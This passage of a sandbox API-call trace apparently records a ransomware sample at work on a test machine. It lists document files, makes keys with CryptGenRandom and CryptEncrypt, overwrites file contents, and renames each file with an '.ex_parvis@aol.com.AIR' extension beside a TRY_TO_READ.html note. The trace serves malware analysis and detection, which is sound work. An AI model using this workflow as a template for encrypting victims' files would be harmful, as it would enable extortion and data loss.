	[0106.095] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\j97ZvkQ0wGZu.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\j97zvkq0wgzu.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518
	[0106.095] GetProcessHeap () returned 0x540000
	[0106.095] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.095] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=102286) returned 1
	[0106.095] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x18f8e
	[0106.095] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.095] GetProcessHeap () returned 0x540000
	[0106.095] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.095] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.096] WriteFile (in: hFile=0x518, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.097] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.097] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.097] ReadFile (in: hFile=0x518, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x18f8e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x18f8e, lpOverlapped=0x0) returned 1
	[0106.100] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.100] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.100] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods", dwFileAttributes=0x80) returned 1
	[0106.100] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods") returned 76
	[0106.100] GetProcessHeap () returned 0x540000
	[0106.100] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8670
	[0106.100] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods"
	[0106.100] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.100] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\ha3qz1qb9zmifarzs8e.ods"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\ha3qz1qb9zmifarzs8e.ods.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.103] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\HA3Qz1qB9zmIFARZS8e.ods.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\ha3qz1qb9zmifarzs8e.ods.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518
	[0106.103] GetProcessHeap () returned 0x540000
	[0106.103] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.103] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=68886) returned 1
	[0106.103] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x10d16
	[0106.103] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.103] GetProcessHeap () returned 0x540000
	[0106.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.103] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.105] WriteFile (in: hFile=0x518, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.106] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.106] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.107] ReadFile (in: hFile=0x518, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x10d16, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x10d16, lpOverlapped=0x0) returned 1
	[0106.108] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.108] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.108] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx", dwFileAttributes=0x80) returned 1
	[0106.108] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx") returned 73
	[0106.108] GetProcessHeap () returned 0x540000
	[0106.109] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xf8) returned 0x598b60
	[0106.109] lstrcpyW (in: lpString1=0x598b60, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx"
	[0106.109] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.109] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\8ksjsxq29r-deeb.xlsx"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\8ksjsxq29r-deeb.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.114] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\C jzW0ymnd6\\8kSjsxq29r-deEb.xlsx.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\c jzw0ymnd6\\8ksjsxq29r-deeb.xlsx.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518
	[0106.114] GetProcessHeap () returned 0x540000
	[0106.114] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x598b60 | out: hHeap=0x540000) returned 1
	[0106.114] GetFileSizeEx (in: hFile=0x518, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=50162) returned 1
	[0106.114] SetFilePointer (in: hFile=0x518, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xc3f2
	[0106.114] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.114] GetProcessHeap () returned 0x540000
	[0106.114] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.114] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.116] WriteFile (in: hFile=0x518, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.117] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.117] WriteFile (in: hFile=0x518, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.117] ReadFile (in: hFile=0x518, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xc3f2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xc3f2, lpOverlapped=0x0) returned 1
	[0106.118] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7920050, ftCreationTime.dwHighDateTime=0x1d4ccb4, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dadf0
	[0106.118] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7920050, ftCreationTime.dwHighDateTime=0x1d4ccb4, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.118] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacc962b0, ftCreationTime.dwHighDateTime=0x1d4c666, ftLastAccessTime.dwLowDateTime=0x1e872fc0, ftLastAccessTime.dwHighDateTime=0x1d4d172, ftLastWriteTime.dwLowDateTime=0x1e872fc0, ftLastWriteTime.dwHighDateTime=0x1d4d172, nFileSizeHigh=0x0, nFileSizeLow=0x14b4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4QnHUJwKXn2ITGmtl.csv", cAlternateFileName="4QNHUJ~1.CSV")) returned 1
	[0106.118] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ba17fb0, ftCreationTime.dwHighDateTime=0x1d4cd2b, ftLastAccessTime.dwLowDateTime=0x1540fdd0, ftLastAccessTime.dwHighDateTime=0x1d4c757, ftLastWriteTime.dwLowDateTime=0x1540fdd0, ftLastWriteTime.dwHighDateTime=0x1d4c757, nFileSizeHigh=0x0, nFileSizeLow=0x15acb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7tYopUgsZme_2o FHW.xlsx", cAlternateFileName="7TYOPU~1.XLS")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x805b7f0, ftCreationTime.dwHighDateTime=0x1d4d3b9, ftLastAccessTime.dwLowDateTime=0x3bd16fa0, ftLastAccessTime.dwHighDateTime=0x1d4d2b2, ftLastWriteTime.dwLowDateTime=0x3bd16fa0, ftLastWriteTime.dwHighDateTime=0x1d4d2b2, nFileSizeHigh=0x0, nFileSizeLow=0xfe9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8P-zfnq31Syn.xls", cAlternateFileName="8P-ZFN~1.XLS")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe61eedd0, ftCreationTime.dwHighDateTime=0x1d4ce4c, ftLastAccessTime.dwLowDateTime=0xfd88d80, ftLastAccessTime.dwHighDateTime=0x1d4c80c, ftLastWriteTime.dwLowDateTime=0xfd88d80, ftLastWriteTime.dwHighDateTime=0x1d4c80c, nFileSizeHigh=0x0, nFileSizeLow=0xb986, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bwdvOdRVLvi6vbsR.odp", cAlternateFileName="BWDVOD~1.ODP")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fd9ec00, ftCreationTime.dwHighDateTime=0x1d4cbe8, ftLastAccessTime.dwLowDateTime=0x3979f5a0, ftLastAccessTime.dwHighDateTime=0x1d4cdd1, ftLastWriteTime.dwLowDateTime=0x3979f5a0, ftLastWriteTime.dwHighDateTime=0x1d4cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x17374, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dC86BRtfR2oGt.xlsx", cAlternateFileName="DC86BR~1.XLS")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe042a160, ftCreationTime.dwHighDateTime=0x1d4ce22, ftLastAccessTime.dwLowDateTime=0x8903a0b0, ftLastAccessTime.dwHighDateTime=0x1d4cbc1, ftLastWriteTime.dwLowDateTime=0x8903a0b0, ftLastWriteTime.dwHighDateTime=0x1d4cbc1, nFileSizeHigh=0x0, nFileSizeLow=0x3e6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qL4NMeTuP.odp", cAlternateFileName="QL4NME~1.ODP")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6330e90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed0b1a0, ftCreationTime.dwHighDateTime=0x1d4d00e, ftLastAccessTime.dwLowDateTime=0xb2f099f0, ftLastAccessTime.dwHighDateTime=0x1d4ced7, ftLastWriteTime.dwLowDateTime=0xb2f099f0, ftLastWriteTime.dwHighDateTime=0x1d4ced7, nFileSizeHigh=0x0, nFileSizeLow=0x2716, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qUhhgI8vG.xls", cAlternateFileName="_QUHHG~1.XLS")) returned 1
	[0106.119] FindNextFileW (in: hFindFile=0x5dadf0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed0b1a0, ftCreationTime.dwHighDateTime=0x1d4d00e, ftLastAccessTime.dwLowDateTime=0xb2f099f0, ftLastAccessTime.dwHighDateTime=0x1d4ced7, ftLastWriteTime.dwLowDateTime=0xb2f099f0, ftLastWriteTime.dwHighDateTime=0x1d4ced7, nFileSizeHigh=0x0, nFileSizeLow=0x2716, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qUhhgI8vG.xls", cAlternateFileName="_QUHHG~1.XLS")) returned 0
	[0106.119] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.119] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.119] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls", dwFileAttributes=0x80) returned 1
	[0106.119] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls") returned 67
	[0106.119] GetProcessHeap () returned 0x540000
	[0106.119] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xec) returned 0x597dc8
	[0106.119] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls"
	[0106.119] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.119] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\_quhhgi8vg.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\_quhhgi8vg.xls.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.122] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\_qUhhgI8vG.xls.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\_quhhgi8vg.xls.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.122] GetProcessHeap () returned 0x540000
	[0106.122] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0106.122] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=10006) returned 1
	[0106.122] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x2716
	[0106.123] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.123] GetProcessHeap () returned 0x540000
	[0106.123] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.123] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.123] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.124] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.124] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.124] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x2716, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x2716, lpOverlapped=0x0) returned 1
	[0106.124] SetFilePointer (in: hFile=0x51c, lDistanceToMove=-10006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.124] WriteFile (in: hFile=0x51c, lpBuffer=0x60c2d8*, nNumberOfBytesToWrite=0x2716, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60c2d8*, lpNumberOfBytesWritten=0x3a1f778*=0x2716, lpOverlapped=0x0) returned 1
	[0106.124] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.124] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.125] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp", dwFileAttributes=0x80) returned 1
	[0106.125] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp") returned 66
	[0106.125] GetProcessHeap () returned 0x540000
	[0106.125] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x57fb28
	[0106.125] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\qL4NMeTuP.odp"
